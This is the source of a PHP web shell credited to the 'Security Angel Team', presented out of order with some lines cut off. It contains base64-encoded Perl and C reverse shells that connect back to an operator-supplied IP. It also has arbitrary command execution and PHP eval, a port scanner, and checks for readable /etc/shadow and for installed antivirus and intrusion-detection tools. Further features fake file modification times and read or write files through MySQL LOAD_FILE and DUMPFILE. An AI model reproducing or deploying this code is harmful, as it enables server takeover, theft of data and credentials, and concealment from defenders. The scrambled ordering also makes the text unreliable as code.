"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

if ($start && $yourip && $yourport && $use){
if ($use == 'perl') {
cf('/tmp/angel_bc',$back_connect);
$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
} else {
cf('/tmp/angel_bc.c',$back_connect_c);
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res = execute("/tmp/angel_bc $yourip $yourport &");
}
m("Now script try connect to $yourip port $yourport ...");
}

formhead(array('title'=>'Back Connect'));
makehide('action','backconnect');
p('

');
p('Your IP:');
makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
p('Your Port:');
makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
p('Use:');
makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
p('

');
formfoot();
}//end

elseif ($action == 'portscan') {
!$scanip && $scanip = '127.0.0.1';
!$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
formhead(array('title'=>'Port Scan'));
makehide('action','portscan');
p('

');
p('IP:');
makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
p('Port:');
makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
p('

');
formfoot();

if ($startscan) {
p('

Result »

');
p('
    ');
    foreach(explode(',', $scanport) as $port) {
    $fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1);
    if (!$fp) {
    p('
  • '.$scanip.':'.$port.' ------------------------ Close
  • ');
    } else {
    p('
  • '.$scanip.':'.$port.' ------------------------ Open
  • ');
    @fclose($fp);
    }
    }
    p('
');
}
}

elseif ($action == 'eval') {
$phpcode = trim($phpcode);
if($phpcode){
if (!preg_match('#<\?#si', $phpcode)) {
$phpcode = "";
}
eval("?".">$phpcode }
formhead(array('title'=>'Eval PHP Code'));
makehide('action','eval');
maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
p('

Get plugins

');
formfooter();
}//end eval

elseif ($action == 'editfile') {
if(file_exists($opfile)) {
$fp=@fopen($opfile,'r');
$contents=@fread($fp, filesize($opfile));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'Create / Edit File'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
formfooter();

goback();

}//end editfile

elseif ($action == 'newtime') {
$opfilemtime = @filemtime($opfile);
//$time = strtotime("$year-$month-$day $hour:$minute:$second");
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
formhead(array('title'=>'Clone folder/file was last modified time'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
formfooter();
formhead(array('title'=>'Set last modified'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
p('

year:');
makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
p('month:');
makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
p('day:');
makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
p('hour:');
makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
p('minute:');
makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
p('second:');
makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
p('

');
formfooter();
goback();
}//end newtime

elseif ($action == 'shell') {
if (IS_WIN && IS_COM) {
if($program && $parameter) {
$shell= new COM('Shell.Application');
$a = $shell->ShellExecute($program,$parameter);
m('Program run has '.(!$a ? 'success' : 'fail'));
}
!$program && $program = 'c:\windows\system32\cmd.exe';
!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
formhead(array('title'=>'Execute Program'));
makehide('action','shell');
makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
p('

');
makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('

');
formfoot();
}
formhead(array('title'=>'Execute Command'));
makehide('action','shell');
if (IS_WIN && IS_COM) {
$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
}
p('

');
makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('

');
formfoot();

if ($command) {
p('
');
if ($execfunc=='wscript' && IS_WIN && IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w')
);
$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], $command."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
echo(execute($command));
}
p('
');
}
}//end shell

elseif ($action == 'phpenv') {
$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
!$dis_func && $dis_func = 'No';
$info = array(
1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
2 => array('Server Domain',$_SERVER['SERVER_NAME']),
3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
4 => array('Server OS',PHP_OS),
5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
8 => array('PHP run mode',strtoupper(php_sapi_name())),
9 => array('The file path',__FILE__),

10 => array('PHP Version',PHP_VERSION),
11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')),
12 => array('Safe Mode',getcfg('safe_mode')),
13 => array('Administrator',$adminmail),
14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
15 => array('enable_dl',getcfg('enable_dl')),
16 => array('display_errors',getcfg('display_errors')),
17 => array('register_globals',getcfg('register_globals')),
18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
19 => array('memory_limit',getcfg('memory_limit')),
20 => array('post_max_size',getcfg('post_max_size')),
21 => array('upload_max_filesize',$upsize),
22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
23 => array('disable_functions',$dis_func),
);

if($phpvarname) {
m($phpvarname .' : '.getcfg($phpvarname));
}

formhead(array('title'=>'Server environment'));
makehide('action','phpenv');
makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
formfooter();

$hp = array(0=> 'Server', 1=> 'PHP');
for($a=0;$a<2;$a++) {
p('

'.$hp[$a].' »

');
p('
    ');
    if ($a==0) {
    for($i=1;$i<=9;$i++) {
    p('
  • '.$info[$i][0].':'.$info[$i][1].'
  • ');
    }
    } elseif ($a == 1) {
    for($i=10;$i<=23;$i++) {
    p('
  • '.$info[$i][0].':'.$info[$i][1].'
  • ');
    }
    }
    p('
');
}
}//end phpenv

elseif ($action == 'secinfo') {

secparam('Server software', @getenv('SERVER_SOFTWARE'));
secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
secparam('Open base dir', @ini_get('open_basedir'));
secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
secparam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
secparam('Supported databases', implode(', ', $temp));

if( !IS_WIN ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
secparam('OS version', @file_get_contents('/proc/version'));
secparam('Distr name', @file_get_contents('/etc/issue.net'));
$safe_mode = @ini_get('safe_mode');
if(!$GLOBALS['safe_mode']) {
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
secparam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
secparam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
secparam('Downloaders', implode(', ',$temp));
secparam('Hosts', @file_get_contents('/etc/hosts'));
secparam('HDD space', execute('df -h'));
secparam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
secparam('OS Version',execute('ver'));
secparam('Account Settings',execute('net accounts'));
secparam('User Accounts',execute('net user'));
secparam('IP Configurate',execute('ipconfig -all'));
}
}//end

else {
m('Undefined Action');
}

?>



Powered by 2011. Copyright (C) 2004-2011 Security Angel Team [S4T] All Rights Reserved.





/*======================================================
º¯Êý¿â
======================================================*/

function secparam($n, $v) {
$v = trim($v);
if($v) {
p('

'.$n.' »

');
p('
');
if(strpos($v, "\n") === false)
p($v.'
');
else
p('
'.$v.'
');
p('
');
}
}
function m($msg) {
echo '
';
echo $msg;
echo '
';
}
function scookie($key, $value, $life = 0, $prefix = 1) {
global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
$key = ($prefix ? $cookiepre : '').$key;
$life = $life ? $life : $cookielife;
$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
}
function multi($num, $perpage, $curpage, $tablename) {
$multipage = '';
if($num > $perpage) {
$page = 10;
$offset = 5;
$pages = @ceil($num / $perpage);
if($page > $pages) {
$from = 1;
$to = $pages;
} else {
$from = $curpage - $offset;
$to = $curpage + $page - $offset - 1;
if($from < 1) {
$to = $curpage + 1 - $from;
$from = 1;
if(($to - $from) < $page && ($to - $from) < $pages) {
$to = $page;
}
} elseif($to > $pages) {
$from = $curpage - $pages + $to;
$to = $pages;
if(($to - $from) < $page && ($to - $from) < $pages) {
$from = $pages - $page + 1;
}
}
}
$multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : '');
for($i = $from; $i <= $to; $i++) {
$multipage .= $i == $curpage ? $i.' ' : '['.$i.'] ';
}
$multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : '');
$multipage = $multipage ? '

Pages: '.$multipage.'

' : '';
}
return $multipage;
}
// µÇ½Èë¿Ú
function loginpage() {
?>


Password:



exit;
}//end loginpage()

function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('exec')) {
@exec($cfe,$res);
$res = jo error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach($_POST as $key => $value) {
if (IS_GPC) {
$value = s_array($value);
}
$$key = $value;
}
/*===================== ³ÌÐòÅäÖà =====================*/

//echo encode_pass('angel');exit;
//angel = bb3fec7d9e3311522c5f32c1622a2706
// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
$pass = 'bb3fec7d9e3311522c5f32c1622a2706'; //angel

//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
// cookie ǰ׺
$cookiepre = '';
// cookie ×÷ÓÃÓò
$cookiedomain = '';
// cookie ×÷Ó÷¾¶
$cookiepath = '/';
// cookie ÓÐЧÆÚ
$cookielife = 86400;

//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
/*===================== ÅäÖýáÊø =====================*/

$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
} elseif ($charset == 'euc-kr') {
header("content-Type: text/html; charset=euc-kr");
} elseif ($charset == 'euc-jp') {
header("content-Type: text/html; charset=euc-jp");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Éí·ÝÑéÖ¤ =====================*/
if ($action == "logout") {
scookie('loginpass', '', -86400 * 365);
@header('Location: '.$self);
exit;
}
if($pass) {
if ($action == 'login') {
if ($pass == encode_pass($password)) {
scookie('loginpass',encode_pass($password));
@header('Location: '.$self);
exit;
}
}
if ($_COOKIE['loginpass']) {
if ($_COOKIE['loginpass'] != $pass) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ÑéÖ¤½áÊø =====================*/

$errmsg = '';
!$action && $action = 'file';

// ²é¿´PHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
exit;
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}

// ÏÂÔØÎļþ
if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}

// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
if ($doing == 'backupmysql' && !$saveasfile) {
if (!$table) {
$errmsg ='Please choose the table';
} else {
$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$filename = basename($dbname.'.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
foreach($table as $k => $v) {
if ($v) {
sqldumptable($v);
}
}
mysql_close();
exit;
}
}

// ͨ¹ýMYSQLÏÂÔØÎļþ
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
$result = q("select content from tmp_angel");
q("DROP TABLE tmp_angel");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}

?>



<?php echo $action.' - '.$_SERVER['HTTP_HOST'];?>





formhead(array('name'=>'opform'));
makehide('action', $action);
makehide('nowpath', $nowpath);
makehide('p1', $p1);
makehide('p2', $p2);
makehide('p3', $p3);
makehide('p4', $p4);
makehide('p5', $p5);
formfoot();

if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}

?>







/ User: ()

PHP / Safe Mode:
Logout |
File Manager |
MYSQL Manager |
MySQL Upload & Download |
Execute Command |
PHP Variable |
Port Scan |
Security information |
Eval PHP Code
| Back Connect

');

p('');

//²é¿´ËùÓпÉдÎļþºÍĿ¼
$dirdata=array();
$filedata=array();

if ($view_writable == 'dir') {
$dirdata = GetWDirList($nowpath);
$filedata = array();
} elseif ($view_writable == 'file') {
$dirdata = array();
$filedata = GetWFileList($nowpath);
} elseif ($findstr) {
$dirdata = array();
$filedata = GetSFileList($nowpath, $findstr, $re);
} else {
// Ŀ¼Áбí
//scandir()ЧÂʸü¸ß
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath=$nowpath.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$dirdb['dirchmod']=getChmod($filepath);
$dirdb['dirperm']=getPerms($filepath);
$dirdb['fileowner']=getUser($filepath);
$dirdb['dirlink']=$nowpath;
$dirdb['server_link']=$filepath;
$dirdata[]=$dirdb;
} else {
$filedb['filename']=$file;
$filedb['size']=sizecount(@filesize($filepath));
$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$filedb['filechmod']=getChmod($filepath);
$filedb['fileperm']=getPerms($filepath);
$filedb['fileowner']=getUser($filepath);
$filedb['dirlink']=$nowpath;
$filedb['server_link']=$filepath;
$filedata[]=$filedb;
}
}// while
unset($dirdb);
unset($filedb);
@closedir($dirs);
}
@sort($dirdata);
@sort($filedata);
$dir_i = '0';

p('');
makehide('action','file');
makehide('thefile');
makehide('doing');
makehide('dir',$nowpath);

foreach($dirdata as $key => $dirdb){
if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
if($getdir && $getdir == $dirdb['server_link']) {
$attachsize = dirsize($dirdb['server_link']);
$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
} else {
$attachsize = 'Stat';
}
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
$dir_i++;
} else {
if($dirdb['filename']=='..') {
p('');
p('');
p('');
}
}
}

p('');
$file_i = '0';

foreach($filedata as $key => $filedb){
if($filedb['filename']!='..' && $filedb['filename']!='.') {
$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
$file_i++;
}
}
p('');
p('');
p('

$errmsg && m($errmsg);

// »ñÈ¡µ±Ç°Â·¾¶
if (!$dir) {
$dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
}
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}

if ($action == 'file') {

// Åж϶ÁдÇé¿ö
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

// ´´½¨Ä¿Â¼
if ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}

// ÉÏ´«Îļþ
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}

// ±à¼­Îļþ
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}

// ±à¼­ÎļþÊôÐÔ
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}

// ¸ÄÃû
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}

// ¸´ÖÆÎļþ
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}

// ¿Ë¡ʱ¼ä
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ×Ô¶¨Òåʱ¼ä
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ÅúÁ¿É¾³ýÎļþ
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath) {
if (is_dir($filepath)) {
if (@deltree($filepath)) {
$succ++;
} else {
$fail++;
}
} else {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
}
m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select folder/file(s)');
}
}

//²Ù×÷Íê±Ï
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform', 'target'=>'_blank'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
formhead(array('name'=>'getsize'));
makehide('getdir');
makehide('dir');
formfoot();

$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

');

$cwd_links = '';
$path = explode('/', $nowpath);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= ''.$path[$i].'/';
}

?>







()










if (IS_WIN && IS_COM) {
$obj = new COM('scripting.filesystemobject');
if ($obj && is_object($obj) && $obj->Drives) {
echo '
';
$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
$comma = '';
foreach($obj->Drives as $drive) {
if ($drive->Path) {
p($comma.''.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')');
$comma = '|';
}
}
echo '
';
}
}
?>

$findstr = $_POST['findstr'];
$re = $_POST['re'];
tbhead();
p('
');
p('
');
p('WebRoot');
p(' | ScriptPath');
p(' | View All');
p(' | View Writable ( Directory');
p(' | File )');
p(' | Create Directory | Create File');

p('
Find string in files(current folder): Type: Regular expressions
 FilenameLast modifiedSizeChmod / PermsAction
'.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.'');
p(''.$dirdb['dirchmod'].' / ');
p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'
Rename
-Parent Directory
'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.$filedb['size'].'');
p(''.$filedb['filechmod'].' / ');
p(''.$filedb['fileperm'].''.$filedb['fileowner'].'
');
p('Down | ');
p('Copy | ');
p('Edit | ');
p('Rename');
p('
 FilenameLast modifiedSizeChmod / PermsAction
Delete selected'.$dir_i.' directories / '.$file_i.' files
');
}// end dir

elseif ($action == 'sqlfile') {
if($doing=="mysqlupload"){
$file = $_FILES['uploadfile'];
$filename = $file['tmp_name'];
if (file_exists($savepath)) {
m('The goal file has already existed');
} else {
if(!$filename) {
m('Please choose a file');
} else {
$fp=@fopen($filename,'r');
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents = bin2hex($contents);
if(!$upname) $upname = $file['name'];
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
}
}
}
?>

!$dbhost && $dbhost = 'localhost';
!$dbuser && $dbuser = 'root';
!$dbport && $dbport = '3306';
formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
makehide('action','sqlfile');
p('

');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBName:');
makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
p('DBCharset:');
